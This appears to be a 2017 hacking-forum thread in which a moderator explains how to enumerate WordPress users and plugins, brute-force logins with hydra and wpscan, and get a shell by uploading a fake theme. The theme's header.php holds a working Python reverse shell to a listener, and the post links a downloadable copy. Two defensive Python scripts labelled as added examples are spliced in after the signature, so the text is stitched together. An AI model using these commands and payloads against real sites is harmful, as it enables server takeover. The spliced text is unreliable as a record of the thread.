
Author Topic: Getting shell after admin access in WordPress site  (Read 1310 times)

Offline TAPE

  • Top Hat Member Moderator
  • Elite
  • ********
  • Posts: 1249
  • Internets: +193/-0
Getting shell after admin access in WordPress site
« on: March 30, 2017, 07:16:43 AM »
WordPress site enumeration and pwning;

The below has not been tested on many versions, so your mileage using the below tactics might well vary..
(the IPs are different in some examples as the post was created and tested using 2 separate machines)

When testing WordPress sites, one would usually follow something similar to;
  • Enumeration
  • Weak Credential auditing
  • Privilege escalation of non-admin user(s)
  • Obtaining shell access to server

1. WordPress site enumeration
  • WordPress version enumeration
  • User(s) enumeration
  • Plugin & Theme enumeration
WordPress version enumeration
There are a few methods you can try;
- Check the page source for 'generator' tags;
Code:
curl -s 192.168.56.102/wordpress/ | grep generator
- Check if the readme.html is available in the root of the WordPress installation;
   (readme.html will show WordPress version information at the top)
Code:
curl -s 192.168.56.102/wordpress/readme.html | grep Version

- Check the source of the login page; /wordpress-site/wp-login.php
Code:
curl -s 192.168.56.102/wordpress/wp-login.php | grep "ver="

WordPress user(s) enumeration
On default installations users can be found by checking the user IDs;
http://webpage/wordpress_site/?author=1
With a nice one-liner using curl and grep you can do a quick enumeration of the first 5 users;
Code:
for i in $(seq 1 5); do curl -s 192.168.110.105/wordpress/?author=$i | grep '<title>'; done

Cool, 2 users enumerated.

It is actually a good idea to include the -L switch to ensure that you don't miss anything with redirects.
Code:
for i in $(seq 1 5); do curl -sL 192.168.110.105/wordpress/?author=$i | grep '<title>'; done

In WordPress installations with the 'stop-user-enumeration' plugin installed other approaches could be considered;
Code:
curl -i -sL '192.168.56.102/wordpress/?wp-comments-post&author=1' | grep '<title>'

or

Code:
curl -sL 192.168.56.102/wordpress/?wp-comments-post -d author=1 | grep '<title>'

In WordPress 4.7 a REST API was introduced to list all users which opens up other methods to view users;
Code:
curl -s http://localhost/wp-json/wp/v2/users
https://security.dxw.com/advisories/stop-user-enumeration-does-not-stop-user-enumeration/

WordPress Plugin & Theme enumeration
If you are lucky you will be able to browse the /wordpress_site/wp-content/plugins/ and the /wordpress_site/wp-content/themes/  directory and get a nice easy overview of what plugins and themes are installed, but this isn't very likely.

You could also fuzz the directories using wordlists specifically prepared for WordPress.

seclists has some great ones and has a decent CMS section, although from my tests it didn't catch the themes.


You could for instance fuzz the plugin directory and then enumerate further on found directories to get version numbers etc.
Code:
wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/CMS/wp_plugins.fuzz.txt --hc 404 192.168.56.104/wordpress/FUZZ

Another alternative is to use an nmap NSE script to do the hard work for you;
Code:
nmap -sV -p 80 192.168.56.102 --script=http-wordpress-enum.nse --script-args=http-wordpress-enum.root=/wordpress/

2. Weak WordPress credential auditing
With our found admin user in our hands, let's run a quick test login with admin:nimda as credentials to see what the form information is. We can get the nitty gritty details with Inspect Element in the browser;

With this new-found information we can quickly make a username file and fire up a quick bruteforce attack on the wordpress login page to check for weak password usage;
Code:
echo admin > users.txt && echo wpuser >> users.txt
hydra -L users.txt -P lists/500.txt -e nsr 192.168.110.105 http-post-form "/wordpress/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&testcookie=1:S=Location"

Awesome, there are our credentials (yes ch3rn.. it took me a looong time to get that hydra command sorted.. :D ) ;
admin:admin
wpuser:wpuser

+--------------------------------------------------------------------------------------+
Alternative methods (much easier lol.. but we like complicated do we not?!) ;
Enumerate users, plugins and themes;
Code:
wpscan -u http://192.168.110.105/wordpress/ -e u,ap,at

Brute forcing these enumerated users;
Code:
wpscan --users users.txt -w /root/lists/500.txt -u 192.168.110.105/wordpress/
+--------------------------------------------------------------------------------------+

3. Privilege escalation of non-admin user(s)
If you weren't lucky enough to get admin credentials, there may still be a way to escalate a lesser privileged user to admin privileges.

This is where the plugin and theme enumeration comes in; WordPress itself does not often appear to have privilege escalation vulnerabilities of this nature, but plugins and themes occasionally do.

Doing a quick searchsploit of wordpress escalation exploits gives a few responses, and this route is worth a quick check with the enumerated plugins and themes.
Code:
searchsploit wordpress escalation

Failing this, the enumerated plugins and themes should always be checked for exploits, which can range from information disclosure to unauthenticated LFI / RFI / RCE.

4. Obtaining shell access to server
With our nice new shiny admin creds, we head over to the wordpress Dashboard as admin, and get access to themes and plugins and the ability to install new ones.. ooohh yeah..

If you are admin, you can create a fake plugin with a reverse shell so that on activation of the plugin, shell can be obtained.
You can also edit the 'header.php' file of the active Theme into a reverse shell so that on refreshing of the site, reverse shell is obtained.
The drawback is that this means you have to make a semi-permanent change to files and it can cause issues when trying to get back to the site, so I have been looking at alternative ways, but possible methods include;
  • Editing the main header.php script of the WordPress site to contain a reverse shell.
  • Uploading a fake plugin containing a reverse shell.
  • Uploading a fake theme containing a reverse shell.
WordPress Themes

It is trivial to actually create your own fake theme including a reverse shell, upload and have a shell spawned by using the Live Preview only. This means there are no changes made to any files and a nice clean way to get a reverse shell. So what do we need.. First, to see which files are required to create a WordPress theme; https://developer.wordpress.org/themes/release/required-theme-files/
  • style.css
  • index.php
  • comments.php
  • screenshot.png
I also included a header.php file which is called by index.php, the header.php is where the php reverse shell is.
(the IP and PORT need to be changed to suit your setup) So we need to create these files, bundle them into a folder and zip it up to create the WP theme.
This is the content of my fake-theme zip file;

STYLE.CSS
Code:
/*   
   Theme Name:        FAKE WordPress Theme
   Description:       A theme to be installed to allow execution of a shell using Theme Live Preview.
   Author:            TAPE
   Version:           1.0
   License:           Ours Not Yours
   License URI:       Ours
   Tags:              edit IP and PORT in header.php as required, run netcat listener, click on live preview, check for shell
   Text Domain:       fake-theme
*/
INDEX.PHP
Code:
<?php get_header(); ?>
COMMENTS.PHP
I actually left this completely blank; possibly I could have placed the reverse shell code here and had index.php call comments.php instead of header.php.. I'm not sure..
¯\_(ツ)_/¯
HEADER.PHP
Code:
<?php echo shell_exec(`python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.110.101",31337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'`);?>
SCREENSHOT.PNG
I decided to make a .png file which is shown in the wordpress Theme page, just so you know which one to click on :D

Nice and subtle yeah? So, when you bundle all those files in a directory, zip it up and upload to Themes in the WordPress Dashboard, you can start your netcat listener on your attacking machine, click on the theme and choose Live Preview to get your shell.

fake-theme file for those interested; http://www.mediafire.com/file/ya0qn83o0b5e3lu/fake-theme.zip

So, now when we log into the wordpress site as admin and head over to the Dashboard and the theme section, we can install this beautiful new fake theme.

After installation and viewing the Themes again we see the following;

Now when we click on the fake theme, we are presented with some information, can activate, do a Live Preview or delete.

The Live Preview won't activate it, but it will run it as a preview, and as a consequence run the php reverse shell, yeah baby..
Of course we also spawn a nicer shell and set the environment for ease of use;
Code:
python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=linux

Now we can continue on our quest to root, knowing that we have not damaged or altered the server (VM) and can use that same method to gain shell access again with ease.

As the theme is now installed, you can also access/load the reverse shell using curl from your attacking machine should the browser live-demo method be giving you any grief;

Start listener;
Code:
nc -lvp 31337

Access/load the reverse shell located in header.php with curl;
Code:
curl 192.168.56.102/wordpress/wp-content/themes/fake-theme/header.php

Hope the above is of some interest to you guys & gals!
« Last Edit: April 06, 2017, 02:21:10 AM by TAPE »
Take all the advice you like and then tell everyone to **** off and do your own thing -- Gitsnik
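From the defender's side, the enumeration and credential-auditing steps in the post above all leave distinctive traces in the web server access log: a run of `?author=N` requests from one address, a burst of POSTs to `wp-login.php`, and reads of `/wp-json/wp/v2/users`. The script below, an added example rather than anything from the original post, picks those patterns out of combined-format log lines. It assumes Apache/nginx "combined" log format and the thresholds are illustrative; the sample log lines are constructed.

```python
"""Detect the enumeration and credential-auditing traffic shown in this thread
(author-id sweeps, wp-login.php brute force, REST user listing) in web server
access logs. Added example, not code from the original post. Assumes the
Apache/nginx 'combined' log format; the log lines below are constructed."""
import re
from collections import defaultdict
from datetime import datetime

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Thresholds are assumptions for illustration; tune them to the site's baseline.
AUTHOR_IDS_THRESHOLD = 3    # distinct ?author=N values requested by one IP
LOGIN_POSTS_THRESHOLD = 10  # POSTs to wp-login.php from one IP inside the window
WINDOW_SECONDS = 300


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    return rec


def detect(lines):
    """Return a list of (ip, finding) tuples, in a stable order."""
    author_ids = defaultdict(set)
    login_posts = defaultdict(list)
    rest_users = set()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, path = rec["ip"], rec["path"]
        # ?author=N sweeps, including the ?wp-comments-post&author=N variant
        m = re.search(r"[?&]author=(\d+)", path)
        if m:
            author_ids[ip].add(int(m.group(1)))
        # Repeated login form submissions (hydra / wpscan style)
        if rec["method"] == "POST" and re.search(r"/wp-login\.php(\?|$)", path):
            login_posts[ip].append(rec["ts"])
        # WordPress 4.7+ REST endpoint that lists users
        if "/wp-json/wp/v2/users" in path:
            rest_users.add(ip)

    findings = []
    for ip in sorted(author_ids):
        if len(author_ids[ip]) >= AUTHOR_IDS_THRESHOLD:
            findings.append((ip, f"author-id sweep: {len(author_ids[ip])} ids"))
    for ip in sorted(login_posts):
        stamps = sorted(login_posts[ip])
        j = 0  # left edge of a sliding time window over the POST timestamps
        for i in range(len(stamps)):
            while (stamps[i] - stamps[j]).total_seconds() > WINDOW_SECONDS:
                j += 1
            if i - j + 1 >= LOGIN_POSTS_THRESHOLD:
                findings.append((ip, f"login brute force: {i - j + 1} POSTs in {WINDOW_SECONDS}s"))
                break
    for ip in sorted(rest_users):
        findings.append((ip, "REST user listing: /wp-json/wp/v2/users"))
    return findings


# Constructed sample: one host sweeps author ids 1-5 and then hammers the login
# form; another reads the REST users endpoint; a third is ordinary browsing.
SAMPLE_LOG = [
    f'10.0.0.5 - - [30/Mar/2017:07:16:{i:02d} +0000] "GET /wordpress/?author={i} HTTP/1.1" 301 0'
    for i in range(1, 6)
] + [
    f'10.0.0.5 - - [30/Mar/2017:07:17:{i:02d} +0000] "POST /wordpress/wp-login.php HTTP/1.1" 200 3424'
    for i in range(12)
] + [
    '10.0.0.9 - - [30/Mar/2017:07:20:00 +0000] "GET /wp-json/wp/v2/users HTTP/1.1" 200 912',
    '10.0.0.7 - - [30/Mar/2017:07:21:00 +0000] "GET /wordpress/ HTTP/1.1" 200 10234',
]

if __name__ == "__main__":
    for ip, finding in detect(SAMPLE_LOG):
        print(f"{ip:<12} {finding}")
```

The author-id check keys on distinct ids rather than request count because a legitimate author archive is visited repeatedly but by one id; the login check uses a sliding window so a slow-and-low run over a whole day does not slip under a fixed-bucket count.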
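The fake-theme trick in the post works because an admin may upload arbitrary PHP and because a theme template can call PHP's command-execution primitives. Two defensive checks follow, as an added example that is not part of the original post: a scanner that flags those primitives (including the backtick operator header.php uses) inside an uploaded theme or plugin zip, and a check that wp-config.php sets the real WordPress constants DISALLOW_FILE_MODS (blocks theme/plugin install, upload and update, i.e. the upload step above) and DISALLOW_FILE_EDIT (removes the dashboard file editor, so header.php cannot be edited in place). The zip and the wp-config fragment are constructed inline; the header.php stand-in carries only a harmless `uname -a` call, not the post's payload.

```python
"""Two defensive checks against the fake-theme technique in this thread: scan an
uploaded theme/plugin archive for PHP that executes commands or evaluates code,
and verify that wp-config.php forbids theme/plugin installs and file edits.
Added example, not code from the original post. The zip and the wp-config
fragment are constructed inline so the script runs offline."""
import io
import re
import zipfile

# Primitives a theme template almost never needs. The backtick alternative covers
# PHP's shell-execution operator, which the post's header.php relies on.
SUSPICIOUS = re.compile(
    r"\b(shell_exec|exec|system|passthru|popen|proc_open|eval|assert|"
    r"base64_decode|create_function)\s*\(|`[^`\n]+`"
)
PHP_SUFFIXES = (".php", ".phtml", ".inc")


def scan_php(name, source):
    """Return (file, line_no, matched_text) for every suspicious call in source."""
    hits = []
    for n, line in enumerate(source.splitlines(), 1):
        for m in SUSPICIOUS.finditer(line):
            hits.append((name, n, m.group(0)))
    return hits


def scan_archive(data):
    """Scan every PHP-like member of a zip archive given as bytes."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir() or not info.filename.lower().endswith(PHP_SUFFIXES):
                continue
            source = zf.read(info).decode("utf-8", errors="replace")
            hits.extend(scan_php(info.filename, source))
    return hits


# Real WordPress constants: DISALLOW_FILE_MODS blocks installing, updating and
# uploading themes/plugins; DISALLOW_FILE_EDIT removes the dashboard file editor.
HARDENING_CONSTANTS = ("DISALLOW_FILE_MODS", "DISALLOW_FILE_EDIT")
DEFINE_RE = re.compile(
    r"define\(\s*['\"](DISALLOW_FILE_MODS|DISALLOW_FILE_EDIT)['\"]\s*,\s*(true|false)\s*\)",
    re.IGNORECASE,
)


def wp_config_hardening(text):
    """Map each hardening constant to whether wp-config.php sets it to true."""
    state = {name: False for name in HARDENING_CONSTANTS}
    for m in DEFINE_RE.finditer(text):
        state[m.group(1).upper()] = m.group(2).lower() == "true"
    return state


def build_sample_zip():
    """Constructed stand-in for an uploaded theme with the post's file layout;
    header.php carries a harmless shell call instead of the real payload."""
    files = {
        "fake-theme/style.css": "/*\n   Theme Name: FAKE WordPress Theme\n*/\n",
        "fake-theme/index.php": "<?php get_header(); ?>\n",
        "fake-theme/comments.php": "",
        "fake-theme/header.php": "<?php echo shell_exec(`uname -a`); ?>\n",
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in files.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed wp-config.php fragment with both constants set.
SAMPLE_WP_CONFIG = """<?php
define('DB_NAME', 'wordpress');
define('DISALLOW_FILE_EDIT', true);
define('DISALLOW_FILE_MODS', true);
"""

if __name__ == "__main__":
    for name, line_no, text in scan_archive(build_sample_zip()):
        print(f"{name}:{line_no}: {text}")
    print(wp_config_hardening(SAMPLE_WP_CONFIG))
```

The scanner is a triage aid, not a proof of cleanliness: obfuscated code that builds the function name at runtime will not match the pattern, which is why the wp-config constants, which remove the upload and edit paths altogether, are the stronger control.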

Offline kinchan

  • Experienced
  • ***
  • Posts: 183
  • Internets: +17/-0
  • Love My Pi and my N900
Re: Getting shell after admin access in WordPress site
« Reply #1 on: March 30, 2017, 11:41:03 AM »
interesting, I will try this .. thank you TAPE!
"Give a man a fish and you feed him for a day. Teach a man to fish and you feed him for a lifetime."
##### Current project >> otto-gui ##### website #####

Offline Amonsec

  • Top Hat Member
  • Prospect
  • ********
  • Posts: 49
  • Internets: +36/-0
  • 1336 working to become 1337
Re: Getting shell after admin access in WordPress site
« Reply #2 on: March 30, 2017, 12:44:42 PM »
Nice one dude. +1
This post can be useful for the Mr. Robot VulnHub challenge.  :)
"A computer is only as good as its user" - R4V3N
OSCP (2017)

Offline Grey-Matter

  • Top Hat Member
  • Experienced
  • ********
  • Posts: 112
  • Internets: +57/-0
Re: Getting shell after admin access in WordPress site
« Reply #3 on: March 30, 2017, 12:45:38 PM »
friggin awesome brotha. love that user enum trick too. much quicker than breaking out a scanner. great job all  around, thanks for the new knowledge. keep beastin

Offline H4v0K

  • Administrator
  • Elite
  • *****
  • Posts: 1019
  • Internets: +986/-1
Re: Getting shell after admin access in WordPress site
« Reply #4 on: March 30, 2017, 01:50:52 PM »
Nice  8)  . Thanks for sharing +1

Offline doctane

  • Top Hat Member
  • Experienced
  • ********
  • Posts: 154
  • Internets: +14/-0
  • Never should have trusted hollywood!
    • Public key
Re: Getting shell after admin access in WordPress site
« Reply #5 on: March 30, 2017, 03:32:23 PM »
Mad skills!  +2  8)
---
Don't blink, don't move. You feel that, as your worries fade away? You hear that? That's the Sound of Madness, calling for you!

Offline ch3rn0byl

  • Top Hat Member
  • Experienced
  • ********
  • Posts: 187
  • Internets: +1337/-0
  • Grumpy Old Man with Mounds of Salt
Re: Getting shell after admin access in WordPress site
« Reply #6 on: March 30, 2017, 06:14:28 PM »
dude, sick man! too sick!!

The quieter you become, the more you are unlikely to sound stupid.

Offline Malachai

  • Top Hat Member
  • Super Elite
  • ********
  • Posts: 2805
  • Internets: +18/-7
  • #!/bin/sh Day/Night (Grey Hat)
Re: Getting shell after admin access in WordPress site
« Reply #7 on: March 30, 2017, 07:47:45 PM »
Great job!!!
** Don't judge me! **

*//
  Hope that Firewall works because you're SCREWED
  //*

Offline GalaxyNinja

  • Global Moderator
  • Elite
  • *****
  • Posts: 1728
  • Internets: +96/-0
  • My password is **********
Re: Getting shell after admin access in WordPress site
« Reply #8 on: March 31, 2017, 03:43:29 PM »
Very cool TAPE!
A computer is only as strong as its user! -R4v3n